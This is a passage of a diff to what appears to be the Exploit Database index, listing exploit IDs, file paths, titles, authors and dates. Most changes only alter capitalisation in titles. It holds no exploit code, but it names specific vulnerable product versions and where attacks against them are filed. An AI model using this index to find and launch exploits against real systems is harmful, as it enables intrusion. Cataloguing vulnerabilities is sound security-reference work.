31227,platforms/php/webapps/31227.txt,"Yellow Swordfish Simple Forum 1.x - 'sf-profile.php' SQL Injection",2008-02-18,S@BUN,php,webapps,0 -31228,platforms/php/webapps/31228.txt,"WordPress Recipes Blog Plugin 'id' Parameter - SQL Injection",2008-02-18,S@BUN,php,webapps,0 +31228,platforms/php/webapps/31228.txt,"Wordpress Recipes Blog Plugin 'id' Parameter - SQL Injection",2008-02-18,S@BUN,php,webapps,0 31229,platforms/php/webapps/31229.txt,"ProjectPier 0.8 - Multiple HTML Injection / Cross-Site Scripting Vulnerabilities",2008-02-18,L4teral,php,webapps,0 -31230,platforms/php/webapps/31230.txt,"WordPress wp-people Plugin 2.0 - 'wp-people-popup.php' SQL Injection",2008-02-18,S@BUN,php,webapps,0 +31230,platforms/php/webapps/31230.txt,"Wordpress wp-people Plugin 2.0 - 'wp-people-popup.php' SQL Injection",2008-02-18,S@BUN,php,webapps,0 31231,platforms/windows/remote/31231.txt,"SIMM-Comm SCI Photo Chat 3.4.9 - Directory Traversal",2008-02-19,"Luigi Auriemma",windows,remote,0 31232,platforms/multiple/dos/31232.txt,"Foxit WAC Remote Access Server 2.0 Build 3503 - Heap Buffer Overflow",2008-02-16,"Luigi Auriemma",multiple,dos,0 -31233,platforms/multiple/webapps/31233.txt,"WebcamXP 3.72.440/4.05.280 beta - /pocketpc camnum Variable Arbitrary Memory Disclosure",2008-02-18,"Luigi Auriemma",multiple,webapps,0 -31234,platforms/multiple/webapps/31234.txt,"WebcamXP 3.72.440/4.05.280 beta - /show_gallery_pic id Variable Arbitrary Memory Disclosure",2008-02-18,"Luigi Auriemma",multiple,webapps,0 +31233,platforms/multiple/webapps/31233.txt,"WebcamXP 3.72.440/4.05.280 Beta - /pocketpc camnum Variable Arbitrary Memory Disclosure",2008-02-18,"Luigi Auriemma",multiple,webapps,0 +31234,platforms/multiple/webapps/31234.txt,"WebcamXP 3.72.440/4.05.280 Beta - /show_gallery_pic id Variable Arbitrary Memory Disclosure",2008-02-18,"Luigi Auriemma",multiple,webapps,0 31235,platforms/php/webapps/31235.txt,"Jinzora 2.7.5 - 'index.php' Multiple Parameter Cross-Site Scripting",2008-02-19,"Alexandr Polyakov",php,webapps,0 31236,platforms/php/webapps/31236.txt,"Jinzora 2.7.5 - ajax_request.php Multiple Parameter Cross-Site Scripting",2008-02-19,"Alexandr Polyakov",php,webapps,0 31237,platforms/php/webapps/31237.txt,"Jinzora 2.7.5 - slim.php Multiple Parameter Cross-Site Scripting",2008-02-19,"Alexandr Polyakov",php,webapps,0 @@ -28201,7 +28201,7 @@ id,file,description,date,author,platform,type,port 31316,platforms/php/webapps/31316.txt,"Centreon 1.4.2 - color_picker.php Multiple Cross-Site Scripting Vulnerabilities",2008-02-28,"Julien CAYSSOL",php,webapps,0 31317,platforms/php/webapps/31317.txt,"netOffice Dwins 1.3 - Authentication Bypass / Arbitrary File Upload",2008-02-29,RawSecurity.org,php,webapps,0 31318,platforms/php/webapps/31318.txt,"Centreon 1.4.2.3 - 'index.php' Local File Inclusion",2008-02-29,JosS,php,webapps,0 -31319,platforms/php/webapps/31319.txt,"Simple PHP Scripts gallery 0.x - 'index.php' Cross-Site Scripting",2008-02-29,ZoRLu,php,webapps,0 +31319,platforms/php/webapps/31319.txt,"Simple PHP Scripts Gallery 0.x - 'index.php' Cross-Site Scripting",2008-02-29,ZoRLu,php,webapps,0 31320,platforms/php/webapps/31320.txt,"phpMyTourney 2 - tourney/index.php Remote File Inclusion",2008-02-29,"HACKERS PAL",php,webapps,0 31321,platforms/php/webapps/31321.txt,"Heathco Software h2desk - Multiple Information Disclosure Vulnerabilities",2008-03-01,joseph.giron13,php,webapps,0 31322,platforms/php/webapps/31322.txt,"PHP-Nuke Johannes Hass 'gaestebuch 2.2 Module - 'id' Parameter SQL Injection",2008-03-01,TurkishWarriorr,php,webapps,0 @@ -28230,8 +28230,8 @@ id,file,description,date,author,platform,type,port 31353,platforms/php/webapps/31353.txt,"ImageVue 1.7 - dir2.php path Parameter Cross-Site Scripting",2008-03-07,ZoRLu,php,webapps,0 31354,platforms/php/webapps/31354.txt,"ImageVue 1.7 - upload.php path Parameter Cross-Site Scripting",2008-03-07,ZoRLu,php,webapps,0 31355,platforms/php/webapps/31355.txt,"ImageVue 1.7 - dirxml.php path Parameter Cross-Site Scripting",2008-03-07,ZoRLu,php,webapps,0 -31356,platforms/php/webapps/31356.txt,"WordPress 2.3.2 - wp-admin/users.php inviteemail Parameter Cross-Site Scripting",2008-03-07,Doz,php,webapps,0 -31357,platforms/php/webapps/31357.txt,"WordPress 2.3.2 - wp-admin/invites.php to Parameter Cross-Site Scripting",2008-03-07,Doz,php,webapps,0 +31356,platforms/php/webapps/31356.txt,"Wordpress 2.3.2 - wp-admin/users.php inviteemail Parameter Cross-Site Scripting",2008-03-07,Doz,php,webapps,0 +31357,platforms/php/webapps/31357.txt,"Wordpress 2.3.2 - wp-admin/invites.php to Parameter Cross-Site Scripting",2008-03-07,Doz,php,webapps,0 31358,platforms/php/webapps/31358.txt,"Specimen Image Database - taxonservice.php dir Parameter Remote File Inclusion",2008-03-07,ZoRLu,php,webapps,0 31359,platforms/windows/remote/31359.html,"Microsoft Internet Explorer 7.0 - Combined JavaScript and XML Remote Information Disclosure",2008-03-07,"Ronald van den Heetkamp",windows,remote,0 31360,platforms/windows/dos/31360.txt,"MailEnable 3.13 - IMAP Service Multiple Remote Vulnerabilities",2008-03-07,"Luigi Auriemma",windows,dos,0 @@ -28288,7 +28288,7 @@ id,file,description,date,author,platform,type,port 31409,platforms/windows/remote/31409.txt,"BootManage TFTP Server 1.99 - 'filename' Remote Buffer Overflow",2008-03-17,"Luigi Auriemma",windows,remote,0 31410,platforms/php/webapps/31410.txt,"Joomla! and Mambo 'com_guide' Component - 'category' Parameter SQL Injection",2008-03-17,The-0utl4w,php,webapps,0 31411,platforms/cgi/webapps/31411.txt,"RSA WebID 5.3 - 'IISWebAgentIF.dll' Cross-Site Scripting",2008-03-17,quentin.berdugo,cgi,webapps,0 -31412,platforms/osx/remote/31412.txt,"Apple Mac OS X Server 10.5 - Wiki Server Directory Traversal",2008-03-17,"Rodrigo Carvalho",osx,remote,0 +31412,platforms/osx/remote/31412.txt,"Apple Mac OSX Server 10.5 - Wiki Server Directory Traversal",2008-03-17,"Rodrigo Carvalho",osx,remote,0 31413,platforms/asp/webapps/31413.txt,"Imperva SecureSphere 5.0 - Cross-Site Scripting",2008-03-17,Berezniski,asp,webapps,0 31414,platforms/php/webapps/31414.txt,"phpstats 0.1_alpha - 'phpstats.php' Cross-Site Scripting",2008-03-18,"Hanno Boeck",php,webapps,0 31415,platforms/php/webapps/31415.txt,"eForum 0.4 - 'busca.php' Multiple Cross-Site Scripting Vulnerabilities",2008-03-18,Omni,php,webapps,0 @@ -28298,7 +28298,7 @@ id,file,description,date,author,platform,type,port 31420,platforms/php/webapps/31420.txt,"Eventy Online Scheduler 1.8 - Multiple Vulnerabilities",2014-02-05,"AtT4CKxT3rR0r1ST ",php,webapps,80 31421,platforms/php/webapps/31421.txt,"Booking Calendar - Multiple Vulnerabilities",2014-02-05,"AtT4CKxT3rR0r1ST ",php,webapps,80 31423,platforms/windows/webapps/31423.txt,"IBM Business Process Manager - User Account Reconfiguration",2014-02-05,0in,windows,webapps,0 -31424,platforms/php/webapps/31424.txt,"WordPress Dandelion Theme - Arbitry File Upload",2014-02-05,TheBlackMonster,php,webapps,80 +31424,platforms/php/webapps/31424.txt,"Wordpress Dandelion Theme - Arbitry File Upload",2014-02-05,TheBlackMonster,php,webapps,80 31425,platforms/hardware/webapps/31425.txt,"D-Link DIR-100 - Multiple Vulnerabilities",2014-02-05,"Felix Richter",hardware,webapps,80 31426,platforms/php/webapps/31426.txt,"Plogger 1.0 (RC1) - Multiple Vulnerabilities",2014-02-05,killall-9,php,webapps,80 31427,platforms/php/webapps/31427.txt,"ownCloud 6.0.0a - Multiple Vulnerabilities",2014-02-05,absane,php,webapps,80 @@ -28392,7 +28392,7 @@ id,file,description,date,author,platform,type,port 31527,platforms/hardware/webapps/31527.nse,"ZTE ZXV10 W300 Router - Hardcoded Credentials",2014-02-09,"Cesar Neira",hardware,webapps,80 31532,platforms/php/webapps/31532.txt,"Clever Copy 3.0 - 'postview.php' SQL Injection",2008-03-25,U238,php,webapps,0 31533,platforms/novell/remote/31533.txt,"Novell eDirectory 8.x - eMBox Utility 'edirutil' Command Unspecified",2008-03-25,"Nicholas Gregorie",novell,remote,0 -31534,platforms/windows/remote/31534.html,"LEADTOOLS Multimedia 15 - 'LTMM15.DLL' ActiveX Control Arbitrary File Overwrite Vulnerabilities",2008-03-25,shinnai,windows,remote,0 +31534,platforms/windows/remote/31534.html,"LeadTools Multimedia 15 - 'LTMM15.DLL' ActiveX Control Arbitrary File Overwrite Vulnerabilities",2008-03-25,shinnai,windows,remote,0 31535,platforms/php/webapps/31535.txt,"phpBB PJIRC Module 0.5 - 'irc.php' Local File Inclusion",2008-03-25,0in,php,webapps,0 31536,platforms/windows/remote/31536.txt,"File Transfer 1.2 - Request File Directory Traversal",2007-11-10,teeed,windows,remote,0 31537,platforms/cgi/webapps/31537.txt,"Blackboard Academic Suite 6/7 - webapps/blackboard/execute/viewCatalog searchText Parameter Cross-Site Scripting",2008-03-26,Knight4vn,cgi,webapps,0 @@ -28424,13 +28424,13 @@ id,file,description,date,author,platform,type,port 31562,platforms/windows/remote/31562.txt,"2X ThinClientServer 5.0 sp1-r3497 TFTP Service - Directory Traversal",2008-03-29,"Luigi Auriemma",windows,remote,0 31563,platforms/windows/dos/31563.txt,"SLMail Pro 6.3.1.0 - Multiple Remote Denial Of Service / Memory Corruption Vulnerabilities",2008-03-31,"Luigi Auriemma",windows,dos,0 31564,platforms/php/webapps/31564.txt,"Jack (tR) Jax LinkLists 1.00 - 'jax_linklists.php' Cross-Site Scripting",2008-03-31,ZoRLu,php,webapps,0 -31565,platforms/php/webapps/31565.txt,"@lex Guestbook 4.0.5 - setup.php language_setup Parameter Cross-Site Scripting",2008-03-31,ZoRLu,php,webapps,0 -31566,platforms/php/webapps/31566.txt,"@lex Guestbook 4.0.5 - 'index.php' test Parameter Cross-Site Scripting",2008-03-31,ZoRLu,php,webapps,0 +31565,platforms/php/webapps/31565.txt,"@lex GuestBook 4.0.5 - setup.php language_setup Parameter Cross-Site Scripting",2008-03-31,ZoRLu,php,webapps,0 +31566,platforms/php/webapps/31566.txt,"@lex GuestBook 4.0.5 - 'index.php' test Parameter Cross-Site Scripting",2008-03-31,ZoRLu,php,webapps,0 31567,platforms/php/webapps/31567.txt,"@lex Poll 1.2 - 'setup.php' Cross-Site Scripting",2008-03-31,ZoRLu,php,webapps,0 31568,platforms/php/webapps/31568.txt,"PHP Classifieds 6.20 - Multiple Cross-Site Scripting / Authentication Bypass Vulnerabilities",2008-03-31,ZoRLu,php,webapps,0 31569,platforms/hardware/webapps/31569.txt,"D-Link DSL-2750B ADSL Router - Cross-Site Request Forgery",2014-02-11,killall-9,hardware,webapps,80 -31570,platforms/php/webapps/31570.txt,"WordPress Frontend Upload Plugin - Arbitrary File Upload",2014-02-11,"Daniel Godoy",php,webapps,80 -31571,platforms/php/webapps/31571.txt,"WordPress Buddypress Plugin 1.9.1 - Privilege Escalation",2014-02-11,"Pietro Oliva",php,webapps,80 +31570,platforms/php/webapps/31570.txt,"Wordpress Frontend Upload Plugin - Arbitrary File Upload",2014-02-11,"Daniel Godoy",php,webapps,80 +31571,platforms/php/webapps/31571.txt,"Wordpress Buddypress Plugin 1.9.1 - Privilege Escalation",2014-02-11,"Pietro Oliva",php,webapps,80 32215,platforms/php/webapps/32215.txt,"RMSOFT Downloads Plus - (rmdp) 1.5/1.7 Module for XOOPS search.php key Parameter Cross-Site Scripting",2008-08-09,Lostmon,php,webapps,0 32216,platforms/php/webapps/32216.txt,"RMSOFT Downloads Plus - (rmdp) 1.5/1.7 Module for XOOPS down.php id Parameter Cross-Site Scripting",2008-08-09,Lostmon,php,webapps,0 31573,platforms/ios/webapps/31573.txt,"WiFi Camera Roll 1.2 iOS - Multiple Vulnerabilities",2014-02-11,Vulnerability-Lab,ios,webapps,8880 @@ -28440,7 +28440,7 @@ id,file,description,date,author,platform,type,port 31577,platforms/unix/remote/31577.rb,"Kloxo - SQL Injection / Remote Code Execution",2014-02-11,Metasploit,unix,remote,7778 31578,platforms/windows/webapps/31578.txt,"Tableau Server - Blind SQL Injection",2014-02-11,"Trustwave's SpiderLabs",windows,webapps,80 31579,platforms/windows/webapps/31579.txt,"Titan FTP Server 10.32 Build 1816 - Directory Traversal",2014-02-11,"Fara Rustein",windows,webapps,0 -31580,platforms/php/webapps/31580.txt,"Jax Guestbook 3.31/3.50 - 'jax_guestbook.php' Cross-Site Scripting",2008-03-31,ZoRLu,php,webapps,0 +31580,platforms/php/webapps/31580.txt,"Jax GuestBook 3.31/3.50 - 'jax_guestbook.php' Cross-Site Scripting",2008-03-31,ZoRLu,php,webapps,0 31581,platforms/php/webapps/31581.txt,"PhpGKit 0.9 - 'connexion.php' Remote File Inclusion",2008-03-31,ZoRLu,php,webapps,0 31582,platforms/asp/webapps/31582.txt,"EfesTECH Video 5.0 - 'catID' Parameter SQL Injection",2008-03-31,RMx,asp,webapps,0 31583,platforms/windows/remote/31583.txt,"Microsoft Crypto API X.509 Certificate Validation - Remote Information Disclosure",2008-03-31,"Alexander Klink",windows,remote,0 @@ -28527,9 +28527,9 @@ id,file,description,date,author,platform,type,port 31667,platforms/windows/local/31667.txt,"Microsoft Windows SeImpersonatePrivilege - Privilege Escalation",2008-04-17,"Cesar Cerrudo",windows,local,0 31668,platforms/php/webapps/31668.txt,"TLM CMS 3.1 - Multiple SQL Injections",2008-04-18,ZoRLu,php,webapps,0 31669,platforms/php/webapps/31669.txt,"Wikepage Opus 13 2007.2 - 'wiki' Parameter Cross-Site Scripting",2008-04-18,"Gerendi Sandor Attila",php,webapps,0 -31670,platforms/php/webapps/31670.txt,"WordPress 2.3.3 - 'cat' Parameter Directory Traversal",2008-04-18,"Gerendi Sandor Attila",php,webapps,0 +31670,platforms/php/webapps/31670.txt,"Wordpress 2.3.3 - 'cat' Parameter Directory Traversal",2008-04-18,"Gerendi Sandor Attila",php,webapps,0 31671,platforms/php/webapps/31671.html,"TorrentFlux 2.3 - admin.php Administrator Account Creation Cross-Site Request Forgery",2008-04-18,"Michael Brooks",php,webapps,0 -31672,platforms/php/webapps/31672.txt,"uTorrent WebUI 0.310 beta 2 - Cross-Site Request Forgery",2008-04-18,th3.r00k,php,webapps,0 +31672,platforms/php/webapps/31672.txt,"uTorrent WebUI 0.310 Beta 2 - Cross-Site Request Forgery",2008-04-18,th3.r00k,php,webapps,0 31673,platforms/multiple/webapps/31673.txt,"Azureus HTML WebUI 0.7.6 - Cross-Site Request Forgery",2008-04-18,th3.r00k,multiple,webapps,0 31674,platforms/php/webapps/31674.txt,"XOOPS Recette 2.2 - 'detail.php' SQL Injection",2008-04-19,S@BUN,php,webapps,0 31675,platforms/php/webapps/31675.txt,"Chimaera Project Aterr 0.9.1 - Multiple Local File Inclusion",2008-04-19,KnocKout,php,webapps,0 @@ -28567,7 +28567,7 @@ id,file,description,date,author,platform,type,port 31717,platforms/php/webapps/31717.txt,"MJGUEST 6.7 - QT 'mjguest.php' Cross-Site Scripting",2008-05-01,"Khashayar Fereidani",php,webapps,0 31718,platforms/php/webapps/31718.txt,"CoronaMatrix phpAddressBook 2.0 - 'username' Cross-Site Scripting",2008-05-01,"Khashayar Fereidani",php,webapps,0 31719,platforms/php/webapps/31719.pl,"KnowledgeQuest 2.6 - Administration Multiple Authentication Bypass Vulnerabilities",2008-05-02,Cod3rZ,php,webapps,0 -31720,platforms/php/webapps/31720.txt,"QT-cute QuickTalk Guestbook 1.6 - Multiple Cross-Site Scripting Vulnerabilities",2008-05-02,ZoRLu,php,webapps,0 +31720,platforms/php/webapps/31720.txt,"QT-cute QuickTalk GuestBook 1.6 - Multiple Cross-Site Scripting Vulnerabilities",2008-05-02,ZoRLu,php,webapps,0 31721,platforms/php/webapps/31721.txt,"EJ3 BlackBook 1.0 - footer.php Multiple Parameter Cross-Site Scripting",2008-05-02,"Khashayar Fereidani",php,webapps,0 31722,platforms/php/webapps/31722.txt,"EJ3 BlackBook 1.0 - header.php Multiple Parameter Cross-Site Scripting",2008-05-02,"Khashayar Fereidani",php,webapps,0 31723,platforms/php/webapps/31723.txt,"Alumni 1.0.8/1.0.9 - info.php id Parameter SQL Injection",2008-05-02,hadihadi,php,webapps,0 @@ -28616,7 +28616,7 @@ id,file,description,date,author,platform,type,port 31765,platforms/hardware/webapps/31765.txt,"Barracuda Message Archiver 650 - Persistent Cross-Site Scripting",2014-02-19,Vulnerability-Lab,hardware,webapps,3378 31766,platforms/windows/local/31766.rb,"Audiotran - (.PLS) Stack Buffer Overflow",2014-02-19,Metasploit,windows,local,0 31767,platforms/multiple/remote/31767.rb,"MediaWiki - Thumb.php Remote Command Execution",2014-02-19,Metasploit,multiple,remote,80 -31768,platforms/php/webapps/31768.txt,"WordPress BP Group Documents Plugin 1.2.1 - Multiple Vulnerabilities",2014-02-19,"Tom Adams",php,webapps,80 +31768,platforms/php/webapps/31768.txt,"Wordpress BP Group Documents Plugin 1.2.1 - Multiple Vulnerabilities",2014-02-19,"Tom Adams",php,webapps,80 31769,platforms/windows/remote/31769.html,"Ourgame 'GLIEDown2.dll' ActiveX Control - Remote Code Execution",2008-05-08,anonymous,windows,remote,0 31770,platforms/multiple/remote/31770.txt,"Oracle Application Server Portal 10g - Authentication Bypass",2008-05-09,"Deniz Cevik",multiple,remote,0 31771,platforms/php/webapps/31771.txt,"cPanel 11.x - scripts2/knowlegebase issue Parameter Cross-Site Scripting",2008-05-09,"Matteo Carli",php,webapps,0 @@ -28624,9 +28624,9 @@ id,file,description,date,author,platform,type,port 31773,platforms/php/webapps/31773.txt,"cPanel 11.x - scripts2/listaccts search Parameter Cross-Site Scripting",2008-05-09,"Matteo Carli",php,webapps,0 31774,platforms/php/webapps/31774.txt,"BlogPHP 2.0 - 'index.php' Multiple Parameter Cross-Site Scripting",2008-05-10,"David Sopas Ferreira",php,webapps,0 31775,platforms/php/webapps/31775.txt,"OtherLogic - 'vocourse.php' SQL Injection",2008-05-10,Breeeeh,php,webapps,0 -31776,platforms/php/webapps/31776.txt,"WordPress WP Photo Album Plugin - 'photo' Parameter SQL Injection",2008-05-09,THE_MILLER,php,webapps,0 +31776,platforms/php/webapps/31776.txt,"Wordpress WP Photo Album Plugin - 'photo' Parameter SQL Injection",2008-05-09,THE_MILLER,php,webapps,0 31777,platforms/php/webapps/31777.txt,"AJ Classifieds - 'index.php' SQL Injection",2008-05-12,t0pP8uZz,php,webapps,0 -31778,platforms/php/webapps/31778.txt,"phpInstantGallery 2.0 - 'index.php' gallery Parameter Cross-Site Scripting",2008-05-12,ZoRLu,php,webapps,0 +31778,platforms/php/webapps/31778.txt,"phpInstantGallery 2.0 - 'index.php' Gallery Parameter Cross-Site Scripting",2008-05-12,ZoRLu,php,webapps,0 31779,platforms/php/webapps/31779.txt,"phpInstantGallery 2.0 - image.php Multiple Parameter Cross-Site Scripting",2008-05-12,ZoRLu,php,webapps,0 31780,platforms/php/webapps/31780.txt,"CyrixMED 1.4 - 'index.php' Cross-Site Scripting",2008-05-12,ZoRLu,php,webapps,0 31781,platforms/php/webapps/31781.txt,"IBD Micro CMS 3.5 - 'microcms-admin-login.php' Multiple SQL Injection",2008-05-12,SkyOut,php,webapps,0 @@ -28651,7 +28651,7 @@ id,file,description,date,author,platform,type,port 31800,platforms/php/webapps/31800.pl,"SunShop Shopping Cart 3.5.1 - 'index.php' SQL Injection",2008-05-15,irvian,php,webapps,0 31801,platforms/php/webapps/31801.txt,"ACGV News 0.9.1 - glossaire.php id Parameter SQL Injection",2008-05-16,ZoRLu,php,webapps,0 31802,platforms/php/webapps/31802.txt,"ACGV News 0.9.1 - glossaire.php id Parameter Cross-Site Scripting",2008-05-16,ZoRLu,php,webapps,0 -31803,platforms/php/webapps/31803.txt,"AN Guestbook 0.4 - 'send_email.php' Cross-Site Scripting",2008-05-16,ZoRLu,php,webapps,0 +31803,platforms/php/webapps/31803.txt,"AN GuestBook 0.4 - 'send_email.php' Cross-Site Scripting",2008-05-16,ZoRLu,php,webapps,0 31804,platforms/php/webapps/31804.txt,"Digital Hive 2.0 - 'base_include.php' Local File Inclusion",2008-05-16,ZoRLu,php,webapps,0 31805,platforms/php/webapps/31805.txt,"PHP-Nuke 'KuiraniKerim' Module - 'sid' Parameter SQL Injection",2008-05-17,Lovebug,php,webapps,0 31806,platforms/php/webapps/31806.txt,"bcoos 1.0.13 - 'file' Parameter Local File Inclusion",2008-05-19,Lostmon,php,webapps,0 @@ -28682,9 +28682,9 @@ id,file,description,date,author,platform,type,port 31831,platforms/windows/remote/31831.py,"SolidWorks Workgroup PDM 2014 SP2 - Arbitrary File Write",2014-02-22,"Mohamed Shetta",windows,remote,30000 32045,platforms/php/webapps/32045.txt,"eSyndiCat 2.2 - 'register.php' Multiple Cross-Site Scripting Vulnerabilities",2008-07-10,Fugitif,php,webapps,0 31833,platforms/php/webapps/31833.txt,"ILIAS 4.4.1 - Multiple Vulnerabilities",2014-02-22,HauntIT,php,webapps,80 -31834,platforms/php/webapps/31834.txt,"WordPress AdRotate Plugin 3.9.4 - (clicktracker.php track parameter) SQL Injection",2014-02-22,"High-Tech Bridge SA",php,webapps,80 +31834,platforms/php/webapps/31834.txt,"Wordpress AdRotate Plugin 3.9.4 - (clicktracker.php track parameter) SQL Injection",2014-02-22,"High-Tech Bridge SA",php,webapps,80 31835,platforms/php/webapps/31835.txt,"SAFARI Montage 3.1.3 - 'forgotPW.php' Multiple Cross-Site Scripting Vulnerabilities",2008-05-22,"Omer Singer",php,webapps,0 -31836,platforms/php/webapps/31836.txt,"WordPress Upload File Plugin - 'wp-uploadfile.php' SQL Injection",2008-05-24,eserg.ru,php,webapps,0 +31836,platforms/php/webapps/31836.txt,"Wordpress Upload File Plugin - 'wp-uploadfile.php' SQL Injection",2008-05-24,eserg.ru,php,webapps,0 31837,platforms/php/webapps/31837.txt,"DZOIC Handshakes 3.5 - 'fname' Parameter SQL Injection",2008-05-24,"Ali Jasbi",php,webapps,0 31838,platforms/php/webapps/31838.txt,"Horde Multiple Product - workweek.php timestamp Parameter Cross-Site Scripting",2008-05-24,"Ivan Sanchez",php,webapps,0 31839,platforms/php/webapps/31839.txt,"Horde Multiple Product - week.php timestamp Parameter Cross-Site Scripting",2008-05-24,"Ivan Sanchez",php,webapps,0 @@ -28785,7 +28785,7 @@ id,file,description,date,author,platform,type,port 31937,platforms/php/local/31937.txt,"PHP 5.2.6 - chdir Function http URL Argument safe_mode Restriction Bypass",2008-06-18,"Maksymilian Arciemowicz",php,local,0 31938,platforms/php/webapps/31938.txt,"KEIL Software photokorn 1.542 - 'index.php' SQL Injection",2008-06-18,t@nzo0n,php,webapps,0 31939,platforms/php/webapps/31939.txt,"vBulletin 3.7.1 - Moderation Control Panel 'redirect' Parameter Cross-Site Scripting",2008-06-19,"Jessica Hope",php,webapps,0 -31940,platforms/osx/local/31940.txt,"Apple Mac OS X 10.x - AppleScript ARDAgent Shell Privilege Escalation",2008-06-19,anonymous,osx,local,0 +31940,platforms/osx/local/31940.txt,"Apple Mac OSX 10.x - AppleScript ARDAgent Shell Privilege Escalation",2008-06-19,anonymous,osx,local,0 31941,platforms/multiple/remote/31941.txt,"WISE-FTP 4.1/5.5.8 - FTP Client 'LIST' Command Directory Traversal",2008-06-20,"Tan Chew Keong",multiple,remote,0 31942,platforms/multiple/remote/31942.txt,"Classic FTP 1.02 - 'LIST' Command Directory Traversal",2008-06-20,"Tan Chew Keong",multiple,remote,0 31943,platforms/php/webapps/31943.html,"GL-SH Deaf Forum 6.5.5 - Cross-Site Scripting / Arbitrary File Upload",2008-06-20,"AmnPardaz ",php,webapps,0 @@ -28835,7 +28835,7 @@ id,file,description,date,author,platform,type,port 31982,platforms/php/webapps/31982.txt,"Webuzo 2.1.3 - Multiple Vulnerabilities",2014-02-28,Mahendra,php,webapps,80 32134,platforms/php/webapps/32134.txt,"H0tturk Panel - 'gizli.php' Remote File Inclusion",2008-07-31,U238,php,webapps,0 31983,platforms/multiple/webapps/31983.txt,"Plex Media Server 0.9.9.2.374-aa23a69 - Multiple Vulnerabilities",2014-02-28,"SEC Consult",multiple,webapps,32400 -31986,platforms/php/webapps/31986.txt,"WordPress VideoWhisper 4.27.3 Plugin - Multiple Vulnerabilities",2014-02-28,"High-Tech Bridge SA",php,webapps,80 +31986,platforms/php/webapps/31986.txt,"Wordpress VideoWhisper 4.27.3 Plugin - Multiple Vulnerabilities",2014-02-28,"High-Tech Bridge SA",php,webapps,80 31987,platforms/windows/remote/31987.rb,"GE Proficy CIMPLICITY - gefebt.exe Remote Code Execution",2014-02-28,Metasploit,windows,remote,80 31988,platforms/windows/local/31988.rb,"Total Video Player 1.3.1 - (Settings.ini) SEH Buffer Overflow (Metasploit)",2014-02-28,Metasploit,windows,local,0 31989,platforms/php/webapps/31989.txt,"webERP 4.11.3 - (SalesInquiry.php SortBy parameter) SQL Injection",2014-02-28,HauntIT,php,webapps,80 @@ -28865,7 +28865,7 @@ id,file,description,date,author,platform,type,port 32014,platforms/php/webapps/32014.txt,"Zoph 0.7.2.1 - search.php _off Parameter Cross-Site Scripting",2008-07-07,"Julian Rodriguez",php,webapps,0 32015,platforms/php/webapps/32015.txt,"PHP-Nuke 4ndvddb 0.91 Module - 'id' Parameter SQL Injection",2008-07-07,Lovebug,php,webapps,0 32016,platforms/php/webapps/32016.pl,"fuzzylime (cms) 3.01 - 'blog.php' Local File Inclusion",2008-07-07,Cod3rZ,php,webapps,0 -32017,platforms/php/webapps/32017.html,"VBulletin 3.7.1 - admincp/faq.php Injection adminlog.php Cross-Site Scripting",2008-07-08,"Jessica Hope",php,webapps,0 +32017,platforms/php/webapps/32017.html,"vBulletin 3.7.1 - admincp/faq.php Injection adminlog.php Cross-Site Scripting",2008-07-08,"Jessica Hope",php,webapps,0 32018,platforms/linux/dos/32018.txt,"Multiple Vendors Unspecified SVG File Processing - Denial of Service",2008-07-08,"Kristian Hermansen",linux,dos,0 32019,platforms/linux/dos/32019.txt,"FFmpeg libavformat - 'psxstr.c' STR Data Heap Based Buffer Overflow",2008-07-09,astrange,linux,dos,0 32020,platforms/php/webapps/32020.txt,"PageFusion 1.5 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2008-07-09,"Julian Rodriguez",php,webapps,0 @@ -28897,7 +28897,7 @@ id,file,description,date,author,platform,type,port 32050,platforms/windows/local/32050.py,"Calavera UpLoader 3.5 - SEH Buffer Overflow",2014-03-04,"Daniel la calavera",windows,local,0 32051,platforms/php/webapps/32051.php,"Pubs Black Cat [The Fun] - 'browse.groups.php' SQL Injection",2008-07-14,RMx,php,webapps,0 32052,platforms/windows/remote/32052.html,"Sina DLoader Class - ActiveX Control 'DonwloadAndInstall' Method Arbitrary File Download",2008-07-14,Symantec,windows,remote,0 -32053,platforms/php/webapps/32053.txt,"WordPress 2.5.1 - 'press-this.php' Multiple Cross-Site Scripting Vulnerabilities",2008-07-15,anonymous,php,webapps,0 +32053,platforms/php/webapps/32053.txt,"Wordpress 2.5.1 - 'press-this.php' Multiple Cross-Site Scripting Vulnerabilities",2008-07-15,anonymous,php,webapps,0 32054,platforms/windows/dos/32054.py,"MediaMonkey 3.0.3 - URI Handling Multiple Denial of Service Vulnerabilities",2008-07-16,Shinnok,windows,dos,0 32055,platforms/multiple/local/32055.txt,"Netrw Vim Script - 's:BrowserMaps()' Command Execution",2008-07-16,"Jan Minar",multiple,local,0 32056,platforms/windows/dos/32056.py,"BitComet 1.02 - URI Handling Remote Denial of Service",2008-07-16,Shinnok,windows,dos,0 @@ -28971,7 +28971,7 @@ id,file,description,date,author,platform,type,port 32128,platforms/php/webapps/32128.txt,"MJGUEST 6.8 - 'guestbook.js.php' Cross-Site Scripting",2008-07-30,DSecRG,php,webapps,0 32129,platforms/windows/remote/32129.cpp,"BlazeVideo HDTV Player 3.5 - .PLF File Stack Buffer Overflow",2008-07-30,"fl0 fl0w",windows,remote,0 32130,platforms/php/webapps/32130.txt,"DEV Web Management System 1.5 - Multiple Input Validation Vulnerabilities",2008-07-30,Dr.Crash,php,webapps,0 -32136,platforms/osx/dos/32136.html,"Apple Mac OS X 10.x - CoreGraphics Multiple Memory Corruption Vulnerabilities",2008-07-31,"Michal Zalewski",osx,dos,0 +32136,platforms/osx/dos/32136.html,"Apple Mac OSX 10.x - CoreGraphics Multiple Memory Corruption Vulnerabilities",2008-07-31,"Michal Zalewski",osx,dos,0 32137,platforms/multiple/remote/32137.txt,"Apache Tomcat 6.0.16 - 'RequestDispatcher' Information Disclosure",2008-08-01,"Stefano Di Paola",multiple,remote,0 32138,platforms/multiple/remote/32138.txt,"Apache Tomcat 6.0.16 - 'HttpServletResponse.sendError()' Cross-Site Scripting",2008-08-01,"Konstantin Kolinko",multiple,remote,0 32139,platforms/php/webapps/32139.txt,"freeForum 1.7 - 'acuparam' Parameter Cross-Site Scripting",2008-08-01,ahmadbady,php,webapps,0 @@ -29037,7 +29037,7 @@ id,file,description,date,author,platform,type,port 32201,platforms/php/webapps/32201.txt,"Yogurt Social Network 3.2 rc1 Module for XOOPS - scrapbook.php uid Parameter Cross-Site Scripting",2008-08-09,Lostmon,php,webapps,0 32202,platforms/php/webapps/32202.txt,"Yogurt Social Network 3.2 rc1 Module for XOOPS - 'index.php' uid Parameter Cross-Site Scripting",2008-08-09,Lostmon,php,webapps,0 32203,platforms/php/webapps/32203.txt,"Yogurt Social Network 3.2 rc1 Module 